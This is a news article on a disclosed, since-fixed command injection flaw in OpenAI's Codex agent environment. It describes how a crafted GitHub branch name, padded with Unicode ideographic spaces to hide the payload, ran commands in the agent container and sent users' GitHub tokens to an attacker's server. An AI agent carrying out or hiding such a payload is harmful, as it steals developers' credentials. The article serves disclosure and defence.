- A Carefully Crafted Branch Name Can Steal Your GitHub Auth Token
- Unicode spaces hide malicious payloads from human eyes in plain sight
- Attackers can automate token theft between multiple users sharing a repository
Security researchers have discovered a command injection vulnerability in OpenAI’s Codex cloud environment that allowed attackers to steal GitHub authentication tokens using nothing more than a carefully crafted branch name.
Research by BeyondTrust Phantom Labs found that the vulnerability is due to improper input sanitization in the way Codex processed GitHub branch names during task execution.
By injecting arbitrary commands via the branch name parameter, an attacker could execute malicious payloads inside the agent container and retrieve sensitive authentication tokens that grant access to connected GitHub repositories.
Article continues below.
A vulnerability in sight
What makes this attack particularly concerning is the method researchers developed to hide the malicious payload from human detection.
The team identified a way to disguise the payload using ideographic space, a Unicode character designated U+3000.
By adding 94 ideographic spaces followed by “or true” to the branch name, error conditions can be avoided and the malicious party made invisible in the Codex UI.
Bash ignores ideographic spaces during command execution, but they effectively hide the attack from any user who can see the branch name through the web portal.
The attack could be automated to compromise multiple users interacting with a shared GitHub repository.
With the proper repository permissions, an attacker could create a new branch containing the obfuscated payload and even set that branch as the default branch for the repository.
Any user who subsequently interacted with that branch through the Codex would have their GitHub OAuth token exfiltrated to an external server controlled by the attacker.
The researchers tested this technique by hosting a simple HTTP server on Amazon EC2 to monitor incoming requests, confirming that the stolen tokens were successfully transmitted.
The vulnerability affected several Codex interfaces, including the ChatGPT website, the Codex CLI, the Codex SDK, and the Codex IDE extension.
Phantom Labs also discovered that authentication tokens stored locally on developers’ machines in the auth.json file could be leveraged to replicate the attack via backend APIs.
Beyond simple token theft, the same technique could steal access tokens to the GitHub installation by referencing Codex in a pull request comment, which would trigger a code review container that would execute the payload.
All reported issues have since been fixed in coordination with the OpenAI security team.
However, the discovery raises concerns about AI encryption agents operating with privileged access.
Traditional security tools, such as antivirus and firewalls, cannot prevent this attack because it occurs within the OpenAI cloud environment, beyond their visibility.
To stay secure, organizations should audit the permissions of AI tools, especially agents, and enforce least privilege.
They should also monitor repositories for unusual branch names containing Unicode spaces, rotate GitHub tokens regularly, and review access logs for suspicious API activity.
Follow TechRadar on Google News and add us as a preferred source to receive news, reviews and opinions from our experts in your feeds. Be sure to click the Follow button!
And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp also.




